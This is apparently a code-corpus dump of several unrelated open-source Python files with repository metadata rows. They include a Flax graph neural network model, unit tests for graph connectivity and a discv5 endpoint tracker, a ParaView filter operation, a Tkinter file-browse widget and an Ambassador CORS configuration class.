scene = dataset.get_scene(scene_name="scene_000000")
map = scene.map
assert map is not None
assert map.lane_segments is not None
assert len(map.lane_segments) > 0
assert map.junctions is not None
assert len(map.junctions) > 0
assert map.road_segments is not None
assert len(map.road_segments) > 0
assert map.areas is not None
assert len(map.areas) > 0
segment = list(map.lane_segments.values())[0]
assert len(map.get_lane_segment_predecessors_random_path(lane_segment=segment, steps=5)) > 0
assert len(map.get_lane_segment_successors_random_path(lane_segment=segment, steps=5)) > 0
| 31.4 | 96 | 0.743808 |
9e12c8a162939697444fb8855e0520b5de23847a | 995 | py | Python | tests/model/test_graph_connectivity_dfs.py | unitatem/jira-pert | a95b5d2a9a154d70e464689837559430860173ac | [
"MIT"
] | null | null | null | tests/model/test_graph_connectivity_dfs.py | unitatem/jira-pert | a95b5d2a9a154d70e464689837559430860173ac | [
"MIT"
] | null | null | null | tests/model/test_graph_connectivity_dfs.py | unitatem/jira-pert | a95b5d2a9a154d70e464689837559430860173ac | [
"MIT"
] | null | null | null | import unittest
from jira_pert.model.graph_connectivity_dfs import GraphConnectivityDFS
from jira_pert.model.pert_graph import PertGraph
class MyTestCase(unittest.TestCase):
def test_connected_graph(self):
graph = PertGraph()
graph._add_node(key='A', dependencies=[])
graph._add_node(key='B', dependencies=['A'])
graph._add_node(key='C', dependencies=['A'])
graph_connectivity = GraphConnectivityDFS(graph)
self.assertEqual(True, graph_connectivity.is_connected())
def test_not_connected_graph(self):
graph = PertGraph()
graph._add_node(key='A', dependencies=[])
graph._add_node(key='B', dependencies=['A'])
graph._add_node(key='C', dependencies=[])
graph_connectivity = GraphConnectivityDFS(graph)
self.assertEqual(False, graph_connectivity.is_connected())
self.assertEqual(['C'], graph_connectivity.get_not_connected_nodes())
if __name__ == '__main__':
unittest.main()
| 33.166667 | 77 | 0.698492 |
b026f3f70aa60079b4b5c20a97cba36830217521 | 6,732 | py | Python | examples/ogbg_molpcba/models.py | berndbohnet/flax | 5aa7f335bb8819088c8b1aa89aa459c99eb00c1c | [
"Apache-2.0"
] | 1 | 2022-02-27T13:50:55.000Z | 2022-02-27T13:50:55.000Z | examples/ogbg_molpcba/models.py | berndbohnet/flax | 5aa7f335bb8819088c8b1aa89aa459c99eb00c1c | [
"Apache-2.0"
] | null | null | null | examples/ogbg_molpcba/models.py | berndbohnet/flax | 5aa7f335bb8819088c8b1aa89aa459c99eb00c1c | [
"Apache-2.0"
] | null | null | null | # Copyright 2022 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Definition of the GNN model."""
from typing import Callable, Sequence
from flax import linen as nn
import jax.numpy as jnp
import jraph
def add_graphs_tuples(graphs: jraph.GraphsTuple,
other_graphs: jraph.GraphsTuple) -> jraph.GraphsTuple:
"""Adds the nodes, edges and global features from other_graphs to graphs."""
return graphs._replace(
nodes=graphs.nodes + other_graphs.nodes,
edges=graphs.edges + other_graphs.edges,
globals=graphs.globals + other_graphs.globals)
class MLP(nn.Module):
"""A multi-layer perceptron."""
feature_sizes: Sequence[int]
dropout_rate: float = 0
deterministic: bool = True
activation: Callable[[jnp.ndarray], jnp.ndarray] = nn.relu
@nn.compact
def __call__(self, inputs):
x = inputs
for size in self.feature_sizes:
x = nn.Dense(features=size)(x)
x = self.activation(x)
x = nn.Dropout(
rate=self.dropout_rate, deterministic=self.deterministic)(x)
return x
class GraphNet(nn.Module):
"""A complete Graph Network model defined with Jraph."""
latent_size: int
num_mlp_layers: int
message_passing_steps: int
output_globals_size: int
dropout_rate: float = 0
skip_connections: bool = True
use_edge_model: bool = True
layer_norm: bool = True
deterministic: bool = True
@nn.compact
def __call__(self, graphs: jraph.GraphsTuple) -> jraph.GraphsTuple:
# We will first linearly project the original features as 'embeddings'.
embedder = jraph.GraphMapFeatures(
embed_node_fn=nn.Dense(self.latent_size),
embed_edge_fn=nn.Dense(self.latent_size),
embed_global_fn=nn.Dense(self.latent_size))
processed_graphs = embedder(graphs)
# Now, we will apply a Graph Network once for each message-passing round.
mlp_feature_sizes = [self.latent_size] * self.num_mlp_layers
for _ in range(self.message_passing_steps):
if self.use_edge_model:
update_edge_fn = jraph.concatenated_args(
MLP(mlp_feature_sizes,
dropout_rate=self.dropout_rate,
deterministic=self.deterministic))
else:
update_edge_fn = None
update_node_fn = jraph.concatenated_args(
MLP(mlp_feature_sizes,
dropout_rate=self.dropout_rate,
deterministic=self.deterministic))
update_global_fn = jraph.concatenated_args(
MLP(mlp_feature_sizes,
dropout_rate=self.dropout_rate,
deterministic=self.deterministic))
graph_net = jraph.GraphNetwork(
update_node_fn=update_node_fn,
update_edge_fn=update_edge_fn,
update_global_fn=update_global_fn)
if self.skip_connections:
processed_graphs = add_graphs_tuples(
graph_net(processed_graphs), processed_graphs)
else:
processed_graphs = graph_net(processed_graphs)
if self.layer_norm:
processed_graphs = processed_graphs._replace(
nodes=nn.LayerNorm()(processed_graphs.nodes),
edges=nn.LayerNorm()(processed_graphs.edges),
globals=nn.LayerNorm()(processed_graphs.globals),
)
# Since our graph-level predictions will be at globals, we will
# decode to get the required output logits.
decoder = jraph.GraphMapFeatures(
embed_global_fn=nn.Dense(self.output_globals_size))
processed_graphs = decoder(processed_graphs)
return processed_graphs
class GraphConvNet(nn.Module):
"""A Graph Convolution Network + Pooling model defined with Jraph."""
latent_size: int
num_mlp_layers: int
message_passing_steps: int
output_globals_size: int
dropout_rate: float = 0
skip_connections: bool = True
layer_norm: bool = True
deterministic: bool = True
pooling_fn: Callable[[jnp.ndarray, jnp.ndarray, jnp.ndarray],
jnp.ndarray] = jraph.segment_mean
def pool(self, graphs: jraph.GraphsTuple) -> jraph.GraphsTuple:
"""Pooling operation, taken from Jraph."""
# Equivalent to jnp.sum(n_node), but JIT-able.
sum_n_node = graphs.nodes.shape[0]
# To aggregate nodes from each graph to global features,
# we first construct tensors that map the node to the corresponding graph.
# Example: if you have `n_node=[1,2]`, we construct the tensor [0, 1, 1].
n_graph = graphs.n_node.shape[0]
node_graph_indices = jnp.repeat(
jnp.arange(n_graph),
graphs.n_node,
axis=0,
total_repeat_length=sum_n_node)
# We use the aggregation function to pool the nodes per graph.
pooled = self.pooling_fn(graphs.nodes, node_graph_indices, n_graph)
return graphs._replace(globals=pooled)
@nn.compact
def __call__(self, graphs: jraph.GraphsTuple) -> jraph.GraphsTuple:
# We will first linearly project the original node features as 'embeddings'.
embedder = jraph.GraphMapFeatures(
embed_node_fn=nn.Dense(self.latent_size))
processed_graphs = embedder(graphs)
# Now, we will apply the GCN once for each message-passing round.
for _ in range(self.message_passing_steps):
mlp_feature_sizes = [self.latent_size] * self.num_mlp_layers
update_node_fn = jraph.concatenated_args(
MLP(mlp_feature_sizes,
dropout_rate=self.dropout_rate,
deterministic=self.deterministic))
graph_conv = jraph.GraphConvolution(
update_node_fn=update_node_fn, add_self_edges=True)
if self.skip_connections:
processed_graphs = add_graphs_tuples(
graph_conv(processed_graphs), processed_graphs)
else:
processed_graphs = graph_conv(processed_graphs)
if self.layer_norm:
processed_graphs = processed_graphs._replace(
nodes=nn.LayerNorm()(processed_graphs.nodes),
)
# We apply the pooling operation to get a 'global' embedding.
processed_graphs = self.pool(processed_graphs)
# Now, we decode this to get the required output logits.
decoder = jraph.GraphMapFeatures(
embed_global_fn=nn.Dense(self.output_globals_size))
processed_graphs = decoder(processed_graphs)
return processed_graphs
| 35.431579 | 80 | 0.702763 |
314159a2e4c98b3f0a42c91d9c05a02d9588bba3 | 4,897 | py | Python | packages/seacas/libraries/ioss/src/visualization/catalyst/phactori/Operation/PhactoriExtractComponentOperation.py | tokusanya/seacas | 54d9c3b68508ca96e3db1fd00c5d84a810fb330b | [
"Zlib",
"NetCDF",
"MIT",
"BSL-1.0",
"X11",
"BSD-3-Clause"
] | null | null | null | packages/seacas/libraries/ioss/src/visualization/catalyst/phactori/Operation/PhactoriExtractComponentOperation.py | tokusanya/seacas | 54d9c3b68508ca96e3db1fd00c5d84a810fb330b | [
"Zlib",
"NetCDF",
"MIT",
"BSL-1.0",
"X11",
"BSD-3-Clause"
] | null | null | null | packages/seacas/libraries/ioss/src/visualization/catalyst/phactori/Operation/PhactoriExtractComponentOperation.py | tokusanya/seacas | 54d9c3b68508ca96e3db1fd00c5d84a810fb330b | [
"Zlib",
"NetCDF",
"MIT",
"BSL-1.0",
"X11",
"BSD-3-Clause"
] | null | null | null | # Copyright(C) 1999-2020 National Technology & Engineering Solutions
# of Sandia, LLC (NTESS). Under the terms of Contract DE-NA0003525 with
# NTESS, the U.S. Government retains certain rights in this software.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of NTESS nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from phactori import *
from paraview.simple import *
#phactori_combine_to_single_python_file_subpiece_begin_1
class PhactoriExtractComponentOperation(PhactoriOperationSpecifics):
def __init__(self):
PhactoriOperationSpecifics.__init__(self)
self.Component = 0
self.InputArrayName = "None"
self.InputArrayCellsOrPoints = "POINTS"
self.OutputArrayName = "Result"
return
def ParseParametersFromJson(self, inJson):
keyval1 = "component"
if keyval1 in inJson:
self.Component = inJson[keyval1]
keyval2 = "output array name"
if keyval2 in inJson:
self.OutputArrayName = inJson[keyval2]
keyval3 = "input array name"
if keyval3 in inJson:
self.InputArrayName = inJson[keyval3]
else:
myDebugPrint3AndException(
"PhactoriExtractComponentOperation:ParseParametersFromJson\n"
"must have keys 'input array name' and 'input array type'\n")
keyval4 = "input array type"
if keyval4 in inJson:
typeval = inJson[keyval4]
if typeval == "points":
self.InputArrayCellsOrPoints = "POINTS"
elif typeval == "cells":
self.InputArrayCellsOrPoints = "CELLS"
elif typeval == "nodes":
self.InputArrayCellsOrPoints = "POINTS"
elif typeval == "elements":
self.InputArrayCellsOrPoints = "CELLS"
else:
myDebugPrint3AndException(
"PhactoriExtractComponentOperation:ParseParametersFromJson\n"
"'input array type' must be 'points' 'cells' 'nodes' or 'elements'\n")
else:
myDebugPrint3AndException(
"PhactoriExtractComponentOperation:ParseParametersFromJson\n"
"must have keys 'input array name' and 'input array type'\n")
def CreateParaViewFilter(self, inInputFilter):
if PhactoriDbg(100):
myDebugPrint3("PhactoriExtractComponentOperation:CreateParaViewFilter entered\n", 100)
#info in block class should already be parsed and checked
if PhactoriDbg(100):
myDebugPrint3("about to call UpdatePipelineWithCurrentTimeArgument\n", 100)
UpdatePipelineWithCurrentTimeArgument(inInputFilter)
savedActiveSource = GetActiveSource()
newParaViewFilter = ExtractComponent(Input = inInputFilter)
newParaViewFilter.Component = self.Component
newParaViewFilter.OutputArrayName = self.OutputArrayName
newParaViewFilter.InputArray = [self.InputArrayCellsOrPoints, self.InputArrayName]
if PhactoriDbg(100):
myDebugPrint3(
"newParaViewFilter.Component" + str(newParaViewFilter.Component) + "\n"
"newParaViewFilter.OutputArrayName" + str(newParaViewFilter.OutputArrayName) + "\n"
"newParaViewFilter.InputArray" + str(newParaViewFilter.InputArray) + "\n", 100)
SetActiveSource(newParaViewFilter)
if PhactoriDbg(100):
myDebugPrint3("about to call UpdatePipelineWithCurrentTimeArgument\n", 100)
UpdatePipelineWithCurrentTimeArgument(newParaViewFilter)
SetActiveSource(savedActiveSource)
if PhactoriDbg(100):
myDebugPrint3("PhactoriExtractComponentOperation.CreateParaViewFilter returning\n", 100)
return newParaViewFilter
#phactori_combine_to_single_python_file_subpiece_end_1
| 42.582609 | 94 | 0.745967 |
4b72fc6b03a428c81cd8655c1959f243201c8cea | 3,790 | py | Python | libs/dustUI/dustFrameBrowse.py | minarady1/blink-1 | 4453cf9a9bc4f4ba72b48f569ab9b33d5de177a0 | [
"BSD-3-Clause"
] | 2 | 2021-03-03T05:03:56.000Z | 2021-03-03T05:03:58.000Z | libs/dustUI/dustFrameBrowse.py | minarady1/blink-1 | 4453cf9a9bc4f4ba72b48f569ab9b33d5de177a0 | [
"BSD-3-Clause"
] | 104 | 2016-04-10T19:22:20.000Z | 2018-11-20T15:47:14.000Z | libs/smartmeshsdk-REL-1.3.0.1/libs/dustUI/dustFrameBrowse.py | realms-team/solmanager | 95fa049df041add5f8d37c053ef560d0e5d06dff | [
"BSD-3-Clause"
] | 2 | 2019-03-13T11:43:04.000Z | 2019-04-30T13:54:52.000Z | #!/usr/bin/python
#============================ adjust path =====================================
import sys
import os
if __name__ == '__main__':
here = sys.path[0]
sys.path.insert(0, os.path.join(here, '..'))
#============================ logging =========================================
import logging
class NullHandler(logging.Handler):
def emit(self, record):
pass
log = logging.getLogger('dustFrameBrowse')
log.setLevel(logging.INFO)
log.addHandler(NullHandler())
#============================ imports =========================================
import Tkinter
import tkFileDialog
import dustGuiLib
import dustFrame
from dustStyle import dustStyle
#============================ body ============================================
class dustFrameBrowse(dustFrame.dustFrame):
def __init__(self,parentElem,guiLock,selected_cb,allowMultipleFiles=True,frameName="browse",row=0,column=0):
# record variables
self.selected_cb = selected_cb
self.allowMultipleFiles = allowMultipleFiles
# init parent
dustFrame.dustFrame.__init__(self,parentElem,guiLock,frameName,row,column)
#====
# browse button
self.browseButton = dustGuiLib.Button(self.container,
text='browse',
command=self._browse)
self._add(self.browseButton,0,0)
#======================== public ==========================================
#======================== private =========================================
def _browse(self):
'''
\brief Browse button clicked; have the user select a number of files.
'''
if self.allowMultipleFiles:
title = 'Select multiple files'
else:
title = 'Select a single file'
# open authentication file
selectedFiles = tkFileDialog.askopenfilenames(
title = 'Select a file',
multiple = self.allowMultipleFiles,
filetypes = [
("All types", "*.*"),
]
)
# workaround for http://bugs.python.org/issue5712
if isinstance(selectedFiles, (str, unicode)):
selectedFiles = self.tk.splitlist(selectedFiles)
# log
log.debug("user selected {0}".format([f.split('/')[-1] for f in selectedFiles]))
# call the callback
self.selected_cb(selectedFiles)
#============================ sample app ======================================
# The following gets called only if you run this module as a standalone app, by
# double-clicking on this source file. This code is NOT executed when importing
# this module is a larger application
#
class exampleApp(object):
def __init__(self):
self.window = dustWindow("dustFrameLBRConnection",
self._closeCb)
self.guiLock = threading.Lock()
self.frame = dustFrameBrowse(
self.window,
self.guiLock,
self._dustFrameBrowse_selected_cb,
row=0,column=0)
self.frame.show()
self.window.mainloop()
def _closeCb(self):
print " _closeCb called"
def _dustFrameBrowse_selected_cb(self,filenames):
print "user selected the following files: {0}".format(filenames)
if __name__ == '__main__':
import threading
from dustWindow import dustWindow
exampleApp() | 33.839286 | 112 | 0.485488 |
f2c2fb61d1061f3c60a8bca0954516891decbfb7 | 2,094 | py | Python | tests-trio/p2p-trio/test_endpoint_tracker.py | teotoplak/trinity | 6c67b5debfb94f74d0162c70f92ae3d13918b174 | [
"MIT"
] | 3 | 2019-06-17T13:59:20.000Z | 2021-05-02T22:09:13.000Z | tests-trio/p2p-trio/test_endpoint_tracker.py | teotoplak/trinity | 6c67b5debfb94f74d0162c70f92ae3d13918b174 | [
"MIT"
] | 2 | 2019-04-30T06:22:12.000Z | 2019-06-14T04:27:18.000Z | tests-trio/p2p-trio/test_endpoint_tracker.py | teotoplak/trinity | 6c67b5debfb94f74d0162c70f92ae3d13918b174 | [
"MIT"
] | 2 | 2019-12-14T02:52:32.000Z | 2021-02-18T23:04:44.000Z | import pytest
import trio
from trio.testing import (
wait_all_tasks_blocked,
)
import pytest_trio
from p2p.trio_service import (
background_service,
)
from p2p.tools.factories.discovery import (
EndpointFactory,
EndpointVoteFactory,
ENRFactory,
)
from p2p.tools.factories.keys import (
PrivateKeyFactory,
)
from p2p.discv5.constants import (
IP_V4_ADDRESS_ENR_KEY,
UDP_PORT_ENR_KEY,
)
from p2p.discv5.endpoint_tracker import (
EndpointTracker,
)
from p2p.discv5.enr_db import (
MemoryEnrDb,
)
from p2p.discv5.identity_schemes import (
default_identity_scheme_registry,
)
@pytest.fixture
def private_key():
return PrivateKeyFactory().to_bytes()
@pytest.fixture
def initial_enr(private_key):
return ENRFactory(
private_key=private_key,
)
@pytest_trio.trio_fixture
async def enr_db(initial_enr):
enr_db = MemoryEnrDb(default_identity_scheme_registry)
await enr_db.insert(initial_enr)
return enr_db
@pytest.fixture
def vote_channels():
return trio.open_memory_channel(0)
@pytest.fixture
async def endpoint_tracker(private_key, initial_enr, enr_db, vote_channels):
endpoint_tracker = EndpointTracker(
local_private_key=private_key,
local_node_id=initial_enr.node_id,
enr_db=enr_db,
identity_scheme_registry=default_identity_scheme_registry,
vote_receive_channel=vote_channels[1],
)
async with background_service(endpoint_tracker):
yield endpoint_tracker
@pytest.mark.trio
async def test_endpoint_tracker_updates_enr(endpoint_tracker, initial_enr, enr_db, vote_channels):
endpoint = EndpointFactory()
endpoint_vote = EndpointVoteFactory(endpoint=endpoint)
await vote_channels[0].send(endpoint_vote)
await wait_all_tasks_blocked() # wait until vote has been processed
updated_enr = await enr_db.get(initial_enr.node_id)
assert updated_enr.sequence_number == initial_enr.sequence_number + 1
assert updated_enr[IP_V4_ADDRESS_ENR_KEY] == endpoint.ip_address
assert updated_enr[UDP_PORT_ENR_KEY] == endpoint.port
| 24.068966 | 98 | 0.765043 |
c6f7ef04035cf05bb8e3e49103a54116d00cab72 | 6,613 | py | Python | sandbox/src1/VG.py | sniemi/SamPy | e048756feca67197cf5f995afd7d75d8286e017b | [
"BSD-2-Clause"
] | 5 | 2016-05-28T14:12:28.000Z | 2021-04-22T10:23:12.000Z | sandbox/src1/VG.py | sniemi/SamPy | e048756feca67197cf5f995afd7d75d8286e017b | [
"BSD-2-Clause"
] | null | null | null | sandbox/src1/VG.py | sniemi/SamPy | e048756feca67197cf5f995afd7d75d8286e017b | [
"BSD-2-Clause"
] | 2 | 2015-07-13T10:04:10.000Z | 2021-04-22T10:23:23.000Z | # this is module VG
### JHT: if you have to update this module, then also
### check for possible updates in the other modules HG, VG, HS, VS
import os,math
import Tkinter as Tk
from tiasgatfuncs import *
def doit(fn,dp,mt):
""" JHT: this is the module that analyses an ALFOSC pinhole spectrum
with a Vertical Grism, and recommends an alignment offset to the
current GRISM WHEEL stepper motor units."""
## First check if data file exists
if not os.access(dp+fn+".fits",os.F_OK):
messageOut(mt,"File not found: "+dp+fn+".fits\n")
return "File not found: "+dp+fn+".fits"
messageOut(mt,"\nVertical-Grism analysis of file: "+dp+fn+".fits\n")
from pyraf import iraf
from pyraf import gwm
## Read current grism wheel position from image FITS header
iraf.images.imutil.imgets(dp+fn,"GRISM")
grismid=iraf.images.imutil.imgets.value
if grismid.find("Grism")==-1:
iraf.images.imutil.imgets(dp+fn,"FILTER") # maybe in filter wheel?
grismid=iraf.images.imutil.imgets.value
if grismid.find("Grism")==-1:
messageOut(mt,"Vertical-Grism mode: no vertical grism in wheel\n")
return "File %s: Vertical-Grism mode: no vertical grism in wheel" % fn
## Read current aperture wheel position from image FITS header
iraf.images.imutil.imgets(dp+fn,"APERTUR")
slitid=iraf.images.imutil.imgets.value
if slitid.find("inho")==-1:
messageOut(mt,"Vertical-Grism mode: no pinhole in aperture wheel\n")
return "File %s: Vertical-Grism mode: no pinhole in aperture wheel" % fn
iraf.noao(_doprint=0)
iraf.noao.imred(_doprint=0)
iraf.noao.imred.specred(_doprint=0)
if not os.access("/tmp/tiasgat/",os.F_OK):
os.mkdir("/tmp/tiasgat/")
os.chmod("/tmp/tiasgat/",0777)
if os.access("/tmp/tiasgat/plot",os.F_OK): os.remove("/tmp/tiasgat/plot")
if os.access("/tmp/tiasgat/plot2",os.F_OK): os.remove("/tmp/tiasgat/plot2")
if os.access("/tmp/tiasgat/aplast",os.F_OK): os.remove("/tmp/tiasgat/aplast")
if os.access("/tmp/tiasgat/tvmarks",os.F_OK): os.remove("/tmp/tiasgat/tvmarks")
if os.access("/tmp/tiasgat/logfile",os.F_OK): os.remove("/tmp/tiasgat/logfile")
## Note that this will *not* update any uparm files !! (see pyraf documentation)
iraf.noao.imred.specred.dispaxis=2
iraf.noao.imred.specred.database="/tmp/tiasgat/"
iraf.noao.imred.specred.plotfile="/tmp/tiasgat/plot"
iraf.noao.imred.specred.logfile="/tmp/tiasgat/logfile"
iraf.noao.imred.specred.apedit.width=15
#iraf.lpar(iraf.noao.imred.specred.aptrace)
## Display image on ds9
iraf.set(stdimage="imt512")
iraf.display(dp+fn,1,fill="no",Stdout="/dev/null")
# Suppress IRAF query for number of apertures to find
# This is only necesary for the widest slits: then the call to
# apfind results in an empty database file, as it cannot find an aperture.
# But aptrace works fine anyway (except for the annoying query) !?
iraf.noao.imred.specred.apfind.setParam('nfind.p_value', 1)
iraf.noao.imred.specred.apfind.setParam('nfind.p_mode','h')
## 'find' and trace spectrum; this will dump a plot to /tmp/tiasgat/plot
lines = iraf.noao.imred.specred.apfind(dp+fn,nfind=1,interactive="no", Stdout=1)
for i in range (0,len(lines)): messageOut(mt,lines[i]+"\n")
# To properly fit grism #3 i need low-rej=2.1 and niter=8
lines = iraf.noao.imred.specred.aptrace(dp+fn,interactive="no",step=5,low_reject=2.1,
high_reject=2.1,function="leg",order=2,niterate=8,naverage=1, Stdout=1)
for i in range (0,len(lines)): messageOut(mt,lines[i]+"\n")
## Start graphics window; select the correct plot; show plot
gwm.window("Tiasgat! graphics")
iraf.plot.gkiextract("/tmp/tiasgat/plot",2,Stdout="/tmp/tiasgat/plot2")
gwm.getActiveGraphicsWindow().load("/tmp/tiasgat/plot2")
### how to read the aperture file, as output by aptrace ####
###
### center line 6 gives zero point
### max,min lines 24-25 n = (2 * x - (max + min)) / (max - min)
### c1,c2 lines 26-27
###
### The polynomial can be expressed as the sum
###
### poly = sum from i=1 to order {c_i * z_i}
###
### where the the c_i are the coefficients and the z_i are defined
### interatively as:
###
### z_1 = 1
### z_2 = n
### z_i = ((2*i-3) * n * z_{i-1} - (i-2) * z_{i-2}) / (i - 1)
###
### So for order=2 and for vertical slit/grism: X=center+c1+c2*n
### X=center + c1 + c2*(2 * Y - (max + min)) / (max - min)
### translated to X=a + bY
### a=center + c1 - c2*(max+min)/(max-min)
### b=2*C2/(max-min)
## Read the aperture definition file
apfile=open("/tmp/tiasgat/ap"+dp.replace('/','_')+fn,'r')
lines=apfile.readlines()
apfile.close()
#print lines[5], lines[23:]
c0 = float(lines[5].split(None,9)[1].strip())
lower = float(lines[23].strip())
upper = float(lines[24].strip())
c1 = float(lines[25].strip())
c2 = float(lines[26].strip())
a = c0 + c1 - c2*(upper+lower)/(upper-lower)
b = 2*c2/(upper-lower)
#print "zeropoint ", a, " slope ",b
## Remove aperture definition file
if os.access("/tmp/tiasgat/ap"+dp.replace('/','_')+fn,os.F_OK):
os.remove("/tmp/tiasgat/ap"+dp.replace('/','_')+fn)
## Mark the fit on the image display
if os.access("/tmp/tiasgat/tvmarks",os.F_OK): os.remove("/tmp/tiasgat/tvmarks")
tvmarkfile=open("/tmp/tiasgat/tvmarks",'w')
for i in range(int(lower),int(upper)+1,3):
tvmarkfile.write(str(a+b*i)+" "+str(i)+" 100 s \n")
tvmarkfile.close()
iraf.tv.tvmark(1,"",commands="/tmp/tiasgat/tvmarks",interactive="no")
## Read current grism wheel position from image FITS header
iraf.images.imutil.imgets(dp+fn,"ALGRSTP")
oldwheelunits=float(iraf.images.imutil.imgets.value)
#print "GRISMSTE ", oldwheelunits
## Read binning FITS headers
iraf.images.imutil.imgets(dp+fn,"CDELT1")
xbin=float(iraf.images.imutil.imgets.value)
iraf.images.imutil.imgets(dp+fn,"CDELT2")
ybin=float(iraf.images.imutil.imgets.value)
messageOut(mt,"\nBinning factors "+str(int(xbin))+" x "+str(int(ybin))+"\n")
## Correct the angle for the binning factors.
## A full wheel turn corresponds to 320000 units
offsetangle=-320000 * math.atan(b*xbin/ybin) / (2*math.pi)
messageOut(mt,"Offset to motor units "+str(offsetangle)+"\n")
newwheelunits=offsetangle + oldwheelunits
if newwheelunits < 0: newwheelunits+=320000
return "Result for %s : current GRISM wheel units %d, suggested new value %d" % \
(fn, (0.5+oldwheelunits), (0.5+newwheelunits))
| 37.788571 | 94 | 0.6584 |
3bf75aef975a4f0e6ef65cf81901bcc8f0e7322e | 1,120 | py | Python | tasks/deps.py | ndparker/gensaschema | 36dab1beaecb0f92707b11020a08379958bc516f | [
"Apache-2.0"
] | 3 | 2016-10-25T09:37:19.000Z | 2020-07-21T14:06:00.000Z | tasks/deps.py | ndparker/gensaschema | 36dab1beaecb0f92707b11020a08379958bc516f | [
"Apache-2.0"
] | 2 | 2019-05-23T13:08:56.000Z | 2021-02-25T15:28:41.000Z | tasks/deps.py | ndparker/gensaschema | 36dab1beaecb0f92707b11020a08379958bc516f | [
"Apache-2.0"
] | 3 | 2016-09-02T13:15:05.000Z | 2019-10-01T12:55:10.000Z | # -*- encoding: ascii -*-
"""
Dependencies
~~~~~~~~~~~~
"""
import os as _os
import invoke as _invoke
@_invoke.task()
def old(ctx):
""" List outdated python packages """
with ctx.shell.root_dir():
ctx.run('pip list -o', echo=True)
@_invoke.task()
def package(ctx, upgrade=False):
""" Update python dependencies, excluding development """
with ctx.shell.root_dir():
ctx.run('pip install %s-e .' % ('-U ' if upgrade else '',), echo=True)
@_invoke.task(default=True)
def dev(ctx, upgrade=False):
""" Update python dependencies, including development """
with ctx.shell.root_dir():
ctx.run('pip install %s-r development.txt'
% ('-U ' if upgrade else '',), echo=True)
@_invoke.task()
def reset(ctx, python=False, upgrade=False):
""" Reset your virtual env """
cmd = "bash -il %s/reset.sh"
if python:
cmd += ' -p'
if upgrade:
cmd += ' -u'
cmd += ' %s'
with ctx.shell.root_dir():
pwd = _os.getcwd()
ctx.run(ctx.c(cmd, ctx.shell.native(_os.path.dirname(__file__)), pwd),
pty=True)
| 23.333333 | 78 | 0.579464 |
ad34055627c3a4247f415c918048f5c376da89e4 | 2,131 | py | Python | ambassador/ambassador/ir/ircors.py | ewbankkit/ambassador | e693d96a0df01e9e9dce79e98b6cf0fcfd5ae02e | [
"Apache-2.0"
] | 2 | 2019-03-21T03:40:09.000Z | 2019-10-27T07:32:00.000Z | ambassador/ambassador/ir/ircors.py | ewbankkit/ambassador | e693d96a0df01e9e9dce79e98b6cf0fcfd5ae02e | [
"Apache-2.0"
] | 2 | 2021-03-20T05:48:09.000Z | 2021-03-20T05:48:58.000Z | ambassador/ambassador/ir/ircors.py | ewbankkit/ambassador | e693d96a0df01e9e9dce79e98b6cf0fcfd5ae02e | [
"Apache-2.0"
] | null | null | null | from typing import Any, TYPE_CHECKING
from ..config import Config
from ..utils import RichStatus
from .irresource import IRResource
if TYPE_CHECKING:
from .ir import IR
class IRCORS (IRResource):
def __init__(self, ir: 'IR', aconf: Config,
rkey: str="ir.cors",
kind: str="IRCORS",
name: str="ir.cors",
**kwargs) -> None:
# print("IRCORS __init__ (%s %s %s)" % (kind, name, kwargs))
super().__init__(
ir=ir, aconf=aconf, rkey=rkey, kind=kind, name=name,
**kwargs
)
def setup(self, ir: 'IR', aconf: Config) -> bool:
# 'origins' cannot be treated like other keys, because if it's a
# list, then it remains as is, but if it's a string, then it's
# converted to a list
origins = self.pop('origins', None)
if origins is not None:
if type(origins) is list:
self.allow_origin = origins
elif type(origins) is str:
self.allow_origin = origins.split(',')
else:
self.post_error(RichStatus.fromError("invalid CORS origin - {}".format(origins),
module=self))
return False
for from_key, to_key in [ ( 'max_age', 'max_age' ),
( 'credentials', 'allow_credentials' ),
( 'methods', 'allow_methods' ),
( 'headers', 'allow_headers' ),
( 'exposed_headers', 'expose_headers' ) ]:
value = self.pop(from_key, None)
if value:
self[to_key] = self._cors_normalize(value)
self.enabled = True
return True
@staticmethod
def _cors_normalize(value: Any) -> Any:
"""
List values get turned into a comma-separated string. Other values
are returned unaltered.
"""
if type(value) == list:
return ", ".join([ str(x) for x in value ])
else:
return value
| 31.80597 | 96 | 0.507274 |
192f4ffbf4fc334d86f6d3d7461c053bdf1212ca | 4,951 | py | Python | src/the_tale/the_tale/game/bills/tests/test_place_modifier.py | al-arz/the-tale | 542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5 | [
"BSD-3-Clause"
